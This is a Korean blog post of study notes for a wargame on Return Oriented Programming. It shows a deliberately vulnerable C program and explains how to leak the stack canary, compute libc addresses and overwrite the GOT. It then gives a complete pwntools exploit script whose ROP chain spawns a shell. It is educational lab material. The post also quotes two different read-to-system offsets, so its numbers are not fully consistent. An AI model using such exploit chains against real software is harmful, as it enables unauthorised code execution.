Iriton's log

Exploit Tech: Return Oriented Programming 본문

Pwnable/Study

Exploit Tech: Return Oriented Programming

Iriton 2024. 5. 29. 15:16

*본 포스트는 Dreamhack - Systemhacking Lecture 을 참고하여 작성되었습니다.

 

Return Oriented Programming

리턴 가젯을 사용하여 복잡한 실행 흐름을 구현하는 기법입니다. 공격자는 이를 이용해서 문제 상황에 맞춰 return to library, return to dl-resolve, GOT overwrite 등의 페이로드를 구성할 수 있다.

스택 카나리, NX를 적용하여 컴파일한 바이너리를 ROP를 이용한 GOT Overwrite으로 익스플로잇 하는 실습(wargame: rop)를 진행한다.

// Name: rop.c
// Compile: gcc -o rop rop.c -fno-PIE -no-pie

#include <stdio.h>
#include <unistd.h>

int main() {
  char buf[0x30];

  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);

  // Leak canary
  puts("[1] Leak Canary");
  write(1, "Buf: ", 5);
  read(0, buf, 0x100);
  printf("Buf: %s\\n", buf);

  // Do ROP
  puts("[2] Input ROP payload");
  write(1, "Buf: ", 5);
  read(0, buf, 0x100);

  return 0;
}

분석 및 설계

보호 기법

실습 환경 자체에 ASLR이 적용되어 있고(최신 리눅스는 다 적용되어 있다.) 바이너리에는 카나리와 NX가 적용되어 있다. 대신 NO PIE이다.

코드 분석

지난 코스오 달리 바이너리에서 system 함수를 호출하지 않아서 PLT에 등록되지 않으며 “/bin/sh” 문자열도 데이터 섹션에 기록하지 않았다. 따라서 직접 함수의 주소를 구해야 하고 다른 문자열을 사용할 방법을 고민해야 한다.

익스플로잇 설계

1. 카나리 우회

2. system 함수의 주소 계산

system 함수는 libc.so.6에 정의되어 있으며 해당 라이브러리에는 이 바이너리가 호출하는 read, puts, printf도 정의되어 있다.

라이브러리 파일은 메모리에 매핑될 때 전체가 매핑되므로 다른 함수들과 함께 system 함수도 프로세스 메모리에 같이 적재된다.

바이너리가 system 함수를 직접 호출하지 않아서 system 함수가 GOT에는 등록되지 않는다.

그러나 read, puts, printf는 GOT에 등록되어 있다. main 함수에서 반환될 때는 이 함수들을 모두 호출한 이후이므로 이들의 GOT를 읽을 수 있다면 libc.so.6가 매핑된 영역의 주소를 구할 수 있다.

libc에는 여러 버전이 있는데 같은 libc 안에서 두 데이터 사이의 offset은 항상 같다.

그러므로 사용하는 libc의 버전을 알 때 libc가 매핑된 영역의 임의 주소를 구할 수 있으면 다른 데이터의 주소를 모두 계산할 수 있다.

예를 들어, Ubuntu GLIBC 2.35-0ubuntu3.1에서 read 함수와 system 함수 사이의 거리는 항상 0xc3c20다. 따라서 read함수의 주소를 알 때, system=read-0xc3c20으로 system 함수의 주소를 구할 수 있다. libc 파일이 있으면 다음과 같이 readelf 명령어로 함수의 오프셋을 구할 수 있다.

두 함수 사이 offset은 0xc3c30이다. 이를 이용해서 system 함수의 주소를 구할 수 있다.

3. “/bin/sh”

이 바이너리는 데이터 영역에 “/bin/sh” 문자열이 없다.

따라서 이 문자열을 임의 버퍼에 직접 주입하여 참조하거나, 다른 파일에 포함된 것을 사용해야 한다.

후자의 방법을 선택할 때 많이 사용되는 것이 libc.so.6 에 포함된 “/bin/sh” 문자열이다.

이 문자열의 주소도 system 함수의 주소를 계산할 때처럼 libc 영역의 임의 주소를 구하고, 그 주소로부터 거리를 더하거나 빼서 계산할 수 있다.

이 방법은 주소를 알고 있는 버퍼에 “/bin/sh”를 입력하기 어려울 때 차선책으로 사용될 수 있다.

 

gdb rop으로 디버깅 후 start → search /bin/sh 명령어를 차례로 실행하면 주소를 알 수 있다.

4. GOT overwrite

system 함수와 "/bin/sh" 문자열의 주소를 알고 있으므로, 지난 코스에서처럼 pop rdi; ret 가젯을 활용하여 system(“/bin/sh”)를 호출할 수 있다.

그러나 system 함수의 주소를 알았을 때는 이미 ROP 페이로드가 전송된 이후이므로, 알아낸 system 함수의 주소를 페이로드에 사용하려면 main함수로 돌아가서 다시 버퍼 오버플로우를 일으켜야 한다.

이러한 공격 패턴을 ret2main이라고 부르는데, 이 코스에서는 GOT Overwrite 기법을 통해 한 번에 셸을 획득하겠다.

  1. 호출할 라이브러리 함수의 주소를 프로세스에 매핑된 라이브러리에서 찾는다.
  2. 찾은 주소를 GOT에 적고, 이를 호출한다.
  3. 해당 함수를 다시 호출할 경우, GOT에 적힌 주소를 그대로 참조한다.

위 과정에서 GOT Overwrite에 이용되는 부분은 3번이다.

GOT에 적힌 주소를 검증하지 않고 참조하므로 GOT에 적힌 주소를 변조할 수 있다면, 해당 함수가 재호출될 때 공격자가 원하는 코드가 실행되게 할 수 있다.

알아낸 system 함수의 주소를 어떤 함수의 GOT에 쓰고, 그 함수를 재호출하도록 ROP 체인을 구성하면 될 것이다.

익스플로잇

#!/usr/bin/env python3
# Name: rop.py
from pwn import *

def slog(name, addr): return success(': '.join([name, hex(addr)]))

p = process('./rop')
# p = process('./rop', env= {"LD_PRELOAD" : "./libc.so.6"})
e = ELF('./rop')
libc = ELF('./libc.so.6')

# [1] Leak canary
buf = b'A'*0x39
p.sendafter(b'Buf: ', buf)
p.recvuntil(buf)
cnry = u64(b'\\x00' + p.recvn(7))
slog('canary', cnry)

# [2] Exploit
read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
pop_rdi = 0x0000000000400853
pop_rsi_r15 = 0x0000000000400851
ret = 0x0000000000400854

payload = b'A'*0x38 + p64(cnry) + b'B'*0x8

# write(1, read_got, ...)
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15) + p64(read_got) + p64(0)
payload += p64(write_plt)

# read(0, read_got, ...)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi_r15) + p64(read_got) + p64(0)
payload += p64(read_plt)

# read("/bin/sh") == system("/bin/sh")
payload += p64(pop_rdi)
payload += p64(read_got + 0x8)
payload += p64(ret)
payload += p64(read_plt)

p.sendafter(b'Buf: ', payload)
read = u64(p.recvn(6) + b'\\x00'*2)
lb = read - libc.symbols['read']
system = lb + libc.symbols['system']
slog('read', read)
slog('libc_base', lb)
slog('system', system)

p.send(p64(system) + b'/bin/sh\\x00')

p.interactive()

1. 카나리 우회

지난 코스와 동일한 방식으로 진행되는데 간략히 설명을 하자면

스택 구조를 파악하여 BOF를 발생하여 카나리 8바이트 중 시작 1바이트(\00)를 덮어씌워서 카나리 값을 출력하게 하는 것이다.

2. system 함수의 주소 계산

read 함수의 got를 읽고, read 함수와 system 함수의 오프셋을 이용하여 system 함수의 주소를 계산한다.

pwntools에는 ELF.symbols 이라는 메소드가 정의되어 있는데, 특정 ELF에서 심볼 사이의 오프셋을 계산할 때 유용하게 사용될 수 있다.

예를 들어, 사용하는 libc가 /lib/x86_64-linux-gnu/libc.so.6 일 때, 다음 코드로 system 함수와 read 함수의 오프셋을 구할 수 있다.

write 와 pop rdi; ret 가젯 그리고 pop rsi; pop r15; ret 가젯을 사용하여 read 함수의 GOT를 읽고, 이를 이용해서 system 함수의 주소를 구하는 페이로드를 작성한다.

3. GOT Overwrite 및 “/bin/sh” 입력

“/bin/sh”는 덮어쓸 GOT 엔트리 뒤에 같이 입력한다.

이 바이너리에서는 입력을 위해 read함수를 사용할 수 있다.

read함수는 입력 스트림, 입력 버퍼, 입력 길이, 총 세 개의 인자를 필요로 한다.

함수 호출 규약에 따르면 설정해야 하는 레지스터는 rdi, rsi, rdx입니다.

앞의 두 인자는 pop rdi ; ret와 pop rsi ; pop r15 ; ret 가젯으로 쉽게 설정할 수 있다.

그런데 마지막 rdx와 관련된 가젯은 바이너리에서 찾기 어렵다.

이 바이너리뿐만 아니라, 일반적인 바이너리에서도 rdx와 관련된 가젯은 찾기가 어렵다.

이럴 때는 libc의 코드 가젯이나, libc_csu_init 가젯을 사용하여 문제를 해결할 수 있다.

또는 rdx의 값을 변화시키는 함수를 호출해서 값을 설정할 수도 있다.

예를 들어, strncmp 함수는 rax로 비교의 결과를 반환하고, rdx로 두 문자열의 첫 번째 문자부터 가장 긴 부분 문자열의 길이를 반환한다.

이 실습에서는 read 함수의 GOT를 읽은 뒤 rdx 값이 어느정도 크게 설정되므로, rdx를 설정하는 가젯을 추가하지 않아도 된다. 좀 더 안정적인(reliable) 익스플로잇을 작성하려면 가젯을 추가해줘도 좋다.

read 함수, pop rdi ; ret, pop rsi ; pop r15 ; ret 가젯을 이용하여 read 의 GOT를 sy

stem 함수의 주소로 덮고, read_got + 8 에 “/bin/sh”문자열을 쓰는 익스플로잇을 작성한다.

4. 셸 획득

read 함수의 GOT를 system 함수의 주소로 덮었으므로, 지난 코스와 마찬가지의 방법으로 system(“/bin/sh”) 를 실행할 수 있다.

read 함수, pop rdi; ret 가젯, “/bin/sh”의 주소(read_got + 8 )를 이용하여 셸을 획득하는 익스플로잇을 작성한다.

 

'Pwnable > Study' 카테고리의 다른 글

Exploit Tech: Return to Library  (0) 2024.05.29
Background: Library  (0) 2024.05.22
Mitigation: NX & ASLR  (1) 2024.05.22
Exploit Tech: Return to Shellcode  (0) 2024.05.15
Mitigation: Stack Canary  (0) 2024.05.07
Comments